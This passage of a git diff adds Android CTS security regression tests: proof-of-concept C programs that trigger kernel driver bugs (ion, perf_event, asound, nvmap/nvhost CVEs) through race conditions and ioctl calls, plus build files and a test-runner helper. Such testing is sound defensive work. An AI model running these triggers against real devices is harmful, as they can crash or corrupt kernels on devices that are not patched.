+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &err1);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvmap_alloc_handle alloc = {
+ .heap_mask = 0xFFFFFFFF
+ };
+
+ struct nvhost_syncpt_incr incr[SYNC_NUM];
+
+ struct nvhost_submit_args submit = {
+ .num_syncpt_incrs = SYNC_NUM,
+ .syncpt_incrs = (intptr_t)incr,
+ .timeout = 1,
+ //.class_ids = (intptr_t)&ret
+ };
+
+ memset(incr, 0, sizeof(incr));
+ incr[0].syncpt_id = 6;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1)
+ ERR("[-] open %s failed", NVMAPDEV);
+ else
+ LOG("[+] open %s OK", NVMAPDEV);
+
+ vic = open(VICDEV, O_RDONLY);
+ if(vic == -1)
+ ERR("[-] open %s failed", VICDEV);
+ else
+ LOG("[+] open %s OK", VICDEV);
+
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_CREATE failed");
+ else
+ LOG("[+] NVMAP_IOC_CREATE succeeded, fd = %d", args.handle);
+
+ dma1 = args.handle;
+ err1.mem = dma1;
+ alloc.handle = dma1;
+
+ ret = ioctl(nvmap, NVMAP_IOC_ALLOC, &alloc);
+ if(ret)
+ ERR("[-] ioctl NVMAP_IOC_ALLOC failed");
+ else
+ LOG("[+] NVMAP_IOC_ALLOC succeeded");
+
+ /* create close thread */
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ }
+ LOG("[+] running...");
+ while(1) {
+ ret = ioctl(vic, NVHOST_IOCTL_CHANNEL_SUBMIT, &submit);
+ }
+
+ LOG("[-] passed :(");
+ attack = 0;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++) {
+ pthread_join(close_thread_id[i], NULL);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
new file mode 100644
index 0000000..95ddb3d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-9120
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
new file mode 100644
index 0000000..c03ee45
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-9120/poc.c
@@ -0,0 +1,175 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <errno.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+typedef int ion_user_handle_t;
+
+enum ion_heap_type {
+ ION_HEAP_TYPE_SYSTEM,
+ ION_HEAP_TYPE_SYSTEM_CONTIG,
+ ION_HEAP_TYPE_CARVEOUT,
+ ION_HEAP_TYPE_CHUNK,
+ ION_HEAP_TYPE_DMA,
+ ION_HEAP_TYPE_CUSTOM, /* must be last so device specific heaps always
+ are at the end of this enum */
+ ION_NUM_HEAPS = 16,
+};
+
+#define ION_HEAP_SYSTEM_MASK (1 << ION_HEAP_TYPE_SYSTEM)
+#define ION_HEAP_SYSTEM_CONTIG_MASK (1 << ION_HEAP_TYPE_SYSTEM_CONTIG)
+#define ION_HEAP_CARVEOUT_MASK (1 << ION_HEAP_TYPE_CARVEOUT)
+#define ION_HEAP_TYPE_DMA_MASK (1 << ION_HEAP_TYPE_DMA)
+
+#define ION_NUM_HEAP_IDS sizeof(unsigned int) * 8
+
+struct ion_allocation_data {
+ size_t len;
+ size_t align;
+ unsigned int heap_id_mask;
+ unsigned int flags;
+ ion_user_handle_t handle;
+};
+
+
+struct ion_fd_data {
+ ion_user_handle_t handle;
+ int fd;
+};
+
+
+struct ion_handle_data {
+ ion_user_handle_t handle;
+};
+
+
+struct ion_custom_data {
+ unsigned int cmd;
+ unsigned long arg;
+};
+#define ION_IOC_MAGIC 'I'
+
+#define ION_IOC_ALLOC _IOWR(ION_IOC_MAGIC, 0, \
+ struct ion_allocation_data)
+
+#define ION_IOC_FREE _IOWR(ION_IOC_MAGIC, 1, struct ion_handle_data)
+
+
+#define ION_FLAG_CACHED 1 /* mappings of this buffer should be
+ cached, ion will do cache
+ maintenance when the buffer is
+ mapped for dma */
+#define ION_FLAG_CACHED_NEEDS_SYNC 2 /* mappings of this buffer will created
+ at mmap time, if this is set
+ caches must be managed manually */
+
+int g_fd = -1;
+struct ion_allocation_data* g_allocation = NULL;
+struct ion_handle_data g_free_data;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+int open_driver() {
+ char* dev_path = "/dev/ion";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void prepare_data() {
+ void* data = malloc(0x1000);
+
+ g_allocation = (struct ion_allocation_data*)data;
+
+ g_allocation->len = 0x1000;
+ g_allocation->align = 8;
+ g_allocation->heap_id_mask = 1 << 25;
+ g_allocation->flags = ION_FLAG_CACHED;
+ g_allocation->handle = -1;
+
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+
+ g_free_data.handle = 1;
+}
+
+void trigger_ion_alloc() {
+ ioctl(g_fd, ION_IOC_ALLOC, g_allocation);
+}
+
+void trigger_ion_free() {
+ ioctl(g_fd, ION_IOC_FREE, &g_free_data);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ while (1) {
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ trigger_ion_free();
+ pthread_mutex_unlock(&mutex);
+ }
+
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+ setup_privi_and_affinity(0, 1);
+ prepare_data();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ sleep(1);
+ while (1) {
+ pthread_cond_signal(&cond);
+ usleep(100);
+ trigger_ion_alloc();
+ sleep(1);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
new file mode 100644
index 0000000..cb31e4d
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0403
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
new file mode 100644
index 0000000..51095e7
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0403/poc.c
@@ -0,0 +1,233 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+//overwrite object+0x20,like a list initilize
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <string.h>
+#include <sys/wait.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+
+
+struct perf_event_attr {
+
+ /*
+ * Major type: hardware/software/tracepoint/etc.
+ */
+ __u32 type;
+
+ /*
+ * Size of the attr structure, for fwd/bwd compat.
+ */
+ __u32 size;
+
+ /*
+ * Type specific configuration information.
+ */
+ __u64 config;
+
+ union {
+ __u64 sample_period;
+ __u64 sample_freq;
+ };
+
+ __u64 sample_type;
+ __u64 read_format;
+
+ __u64 disabled : 1, /* off by default */
+ inherit : 1, /* children inherit it */
+ pinned : 1, /* must always be on PMU */
+ exclusive : 1, /* only group on PMU */
+ exclude_user : 1, /* don't count user */
+ exclude_kernel : 1, /* ditto kernel */
+ exclude_hv : 1, /* ditto hypervisor */
+ exclude_idle : 1, /* don't count when idle */
+ mmap : 1, /* include mmap data */
+ comm : 1, /* include comm data */
+ freq : 1, /* use freq, not period */
+ inherit_stat : 1, /* per task counts */
+ enable_on_exec : 1, /* next exec enables */
+ task : 1, /* trace fork/exit */
+ watermark : 1, /* wakeup_watermark */
+ /*
+ * precise_ip:
+ *
+ * 0 - SAMPLE_IP can have arbitrary skid
+ * 1 - SAMPLE_IP must have constant skid
+ * 2 - SAMPLE_IP requested to have 0 skid
+ * 3 - SAMPLE_IP must have 0 skid
+ *
+ * See also PERF_RECORD_MISC_EXACT_IP
+ */
+ precise_ip : 2, /* skid constraint */
+ mmap_data : 1, /* non-exec mmap data */
+ sample_id_all : 1, /* sample_type all events */
+
+ exclude_host : 1, /* don't count in host */
+ exclude_guest : 1, /* don't count in guest */
+
+ exclude_callchain_kernel : 1, /* exclude kernel callchains */
+ exclude_callchain_user : 1, /* exclude user callchains */
+ constraint_duplicate : 1,
+
+ __reserved_1 : 40;
+
+ union {
+ __u32 wakeup_events; /* wakeup every n events */
+ __u32 wakeup_watermark; /* bytes before wakeup */
+ };
+
+ __u32 bp_type;
+ union {
+ __u64 bp_addr;
+ __u64 config1; /* extension of config */
+ };
+ union {
+ __u64 bp_len;
+ __u64 config2; /* extension of config1 */
+ };
+ __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+ /*
+ * Defines set of user regs to dump on samples.
+ * See asm/perf_regs.h for details.
+ */
+ __u64 sample_regs_user;
+
+ /*
+ * Defines size of the user stack to dump on samples.
+ */
+ __u32 sample_stack_user;
+
+ /* Align to u64. */
+ __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+ printf("id=%d arg=%d\n",gettid(),arg);
+
+ int i;
+ struct perf_event_attr attr;
+
+ switch ((long)arg) {
+ case 0:
+ //#16123
+ printf("thread 0\n");
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 1;
+
+ group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+ -1, 0x1ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-group:");
+ }
+
+
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 5;
+
+ child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-child:");
+ }
+
+ created = 1;
+ break;
+ case 1:
+
+ while(!created){
+ sleep(1);
+ }
+
+ printf("thread 1\n");
+ close(group_fd[0]);
+
+ freed = 1;
+
+ break;
+ case 2:
+
+ printf("thread 2\n");
+
+ while(!freed){
+ sleep(1);
+ }
+
+ close(child_fd[0]);
+
+ finished = 1;
+
+ break;
+
+ }
+ return 0;
+}
+
+int poc() {
+ long i;
+ pthread_t th[5];
+ for (i = 0; i < 3; i++) {
+ pthread_create(&th[i], 0, thr, (void *)i);
+ usleep(10000);
+ }
+
+ while(!finished){
+ sleep(1);
+ }
+
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ unsigned int times;
+ times = 0;
+ printf("POC3\n");
+ printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+ fflush(stdout);
+
+ // while(1){
+ pid = fork();
+ if(pid){
+ int status;
+ int ret = waitpid(pid,&status,0);
+
+ printf("[%d]times.\r",times);
+ times++;
+ }else
+ return poc();
+ // }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+ memset(buf, 0xa0, sizeof(buf));
+
+ int fd = open("/proc/asound/version", O_RDWR);
+ if(fd != -1){
+ lseek(fd, 0x1234567800000000, SEEK_SET);
+ write(fd, buf, sizeof(buf));
+ }else{
+ perror("open error\n");
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define SZ_128K 0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+ __u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+ __u64 offset; /* in, byte address */
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+ __u32 flags; /* in */
+ __u32 padding; /* in */
+ union {
+ __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+ __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
+ } o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define GPUDEV "/dev/nvhost-gpu"
+#define ASDEV "/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvhost_as_bind_channel_args as_bind = { 0 };
+ struct nvhost_as_alloc_space_args alloc = {
+ .pages = 1,
+ .page_size = SZ_128K,
+ .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+ };
+ struct nvhost_as_free_space_args free_arg = {
+ .pages = 1,
+ .page_size = SZ_128K
+ };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1) {
+ ERR("[-] open %s failed", NVMAPDEV);
+ goto __cleanup;
+ }
+ gpu = open(GPUDEV, O_RDONLY);
+ if(gpu == -1) {
+ ERR("[-] open %s failed", GPUDEV);
+ goto __cleanup;
+ }
+ asgpu = open(ASDEV, O_RDONLY);
+ if(asgpu == -1) {
+ ERR("[-] open %s failed", ASDEV);
+ goto __cleanup;
+ }
+ // bind the channel
+ as_bind.channel_fd = gpu;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+ if(ret == -1) {
+ ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+ goto __cleanup;
+ } else {
+ //LOG("[+] ioctl OK, channel is bond");
+ }
+
+ #if 1
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret) {
+ ERR("[-] NVMAP_IOC_CREATE failed");
+ goto __cleanup;
+ }
+ #endif
+
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+ goto __cleanup;
+ }
+ free_arg.offset = alloc.o_a.offset;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+ goto __cleanup;
+ }
+
+__cleanup:
+ close(nvmap);
+ close(gpu);
+ close(asgpu);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
public class AdbUtils {
@@ -39,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
@@ -51,17 +51,25 @@
* @param device device to be ran on
* @return the console output from the binary
*/
- public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
- String fullResourceName = pathToPoc;
- File pocFile = File.createTempFile("poc", "");
- try {
- pocFile = extractResource(fullResourceName, pocFile);
- device.pushFile(pocFile, "/data/local/tmp/poc");
- device.executeShellCommand("chmod +x /data/local/tmp/poc");
- return device.executeShellCommand("/data/local/tmp/poc");
- } finally {
- pocFile.delete();
- }
+ public static String runPoc(String pocName, ITestDevice device) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ return device.executeShellCommand("/data/local/tmp/" + pocName);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pathToPoc a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @return the console output from the binary
+ */
+ public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ String output = receiver.getOutput();
+ return output;
}
/**
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..d04ebea
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,107 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
